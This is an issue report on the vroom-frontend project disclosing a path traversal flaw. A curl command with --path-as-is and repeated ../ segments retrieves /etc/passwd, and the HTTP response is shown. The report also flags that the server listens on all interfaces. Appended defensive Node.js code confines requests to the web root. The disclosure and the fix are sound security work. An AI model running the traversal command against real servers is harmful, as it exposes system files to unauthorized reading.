vroom-frontend

Local File Inclusion

Open fitzg2 opened this issue 1 year ago • 0 comments

Be careful about exposing this to the internet

$ curl --path-as-is -i -s -k "http://public-ip:9966/../../../../../../../../../../../../../../../../etc/passwd"
HTTP/1.1 200 OK
content-type: application/octet-stream
Date: Wed, 31 Jul 2024 23:38:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Also it says it's running on 127.0.0.1 when in reality it listens on all ports for some reason.

fitzg2 Aug 01 '24 14:08
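
A root-confinement check that would refuse the request shown in the report, as an added example that is not part of the original issue or the project's code. It assumes a Node.js static file server; the function names and the /srv/www root are hypothetical. Because curl --path-as-is sends the dot segments unnormalized, the check has to happen on the server.

```javascript
// Added example: hypothetical handler, not vroom-frontend's own code.
const http = require('node:http');
const fs = require('node:fs');
const path = require('node:path');

// Map a raw request target to a file under webRoot; null if it escapes.
function resolveUnderRoot(webRoot, rawUrl) {
  let pathname;
  try {
    // Drop the query string, then decode escapes such as %2e%2e once.
    pathname = decodeURIComponent(rawUrl.split('?')[0]);
  } catch {
    return null; // malformed percent-encoding
  }
  if (pathname.includes('\0')) return null;
  const root = path.resolve(webRoot);
  // The leading '.' keeps the request path relative to root before
  // path.resolve collapses the dot segments.
  const candidate = path.resolve(root, '.' + path.sep + pathname);
  // Compare against root + separator so /srv/www-old does not pass as /srv/www.
  if (candidate !== root && !candidate.startsWith(root + path.sep)) return null;
  return candidate;
}

function createStaticServer(webRoot) {
  return http.createServer((req, res) => {
    const file = resolveUnderRoot(webRoot, req.url);
    if (file === null) {
      res.writeHead(403);
      return res.end('Forbidden\n');
    }
    fs.createReadStream(file)
      .on('error', () => {
        if (!res.headersSent) res.writeHead(404);
        res.end('Not found\n');
      })
      .pipe(res);
  });
}

// Pass the host explicitly: without it Node listens on all interfaces.
function serveLoopback(webRoot, port) {
  return createStaticServer(webRoot).listen(port, '127.0.0.1');
}
```

The check is lexical only: a symlink inside the root that points outside it is still followed, so resolve the result with fs.realpath and compare again if the root can contain links.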